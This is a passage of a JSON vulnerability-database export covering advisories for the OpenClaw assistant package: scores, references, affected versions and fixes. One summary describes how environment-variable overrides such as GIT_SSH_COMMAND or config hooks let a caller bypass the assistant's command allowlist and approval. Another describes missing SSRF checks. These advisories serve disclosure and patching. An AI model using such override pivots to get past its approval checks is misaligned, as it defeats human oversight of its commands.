/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40037","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"ur
l":"https://nvd.nist.gov/vuln/detail/CVE-2026-40037"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects"},{"reference_url":"https://github.com/advisories/GHSA-pg8g-f2hf-x82m","reference_id":"GHSA-pg8g-f2hf-x82m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pg8g-f2hf-x82m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"v
ulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["GHSA-pg8g-f2hf-x82m"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-73cz-n29z-uqem"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50764?format=json","vulnera
bility_id":"VCID-74bc-hfqh-cbcd","summary":"OpenClaw's `system.run` env override filtering allowed dangerous helper-command pivots\n`system.run` env override sanitization allowed dangerous override-only helper-command pivots to reach subprocesses. A caller who could invoke `system.run` with `env` overrides could bypass allowlist/approval intent by steering an allowlisted tool through helper-command or config-loading environment variables such as `GIT_SSH_COMMAND`, editor/pager hooks, and `GIT_CONFIG_*` / `NPM_CONFIG_*`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e27bbe4982439da6864160fd1b66445058f74801","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e27bbe4982439da6864160fd1b66445058f74801"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-j425-whc4-4jgc","reference_id":"GHSA-j425-whc4-4jgc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j425-whc4-4jgc"},{"reference_url":"https://gith
ub.com/openclaw/openclaw/security/advisories/GHSA-j425-whc4-4jgc","reference_id":"GHSA-j425-whc4-4jgc","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j425-whc4-4jgc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"V
CID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"V
CID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"V
CID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"V
CID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"V
CID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"V
CID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-j425-whc4-4jgc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-74bc-hfqh-cbcd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/88979?format=json","vulnerability_id":"VCID-75yr-sbce-nkah","summary":"OpenClaw QQ Bot Extension missing SSRF Protection on All Media Fetch Paths\n## Impact\n\nQQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths.\n\nQQ Bot 
media download paths were not consistently routed through the SSRF guard and allowlist policy.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @adithyan-ak for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41914","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11193","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11187","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41914"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3fv3-6p2v-gxwj","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","
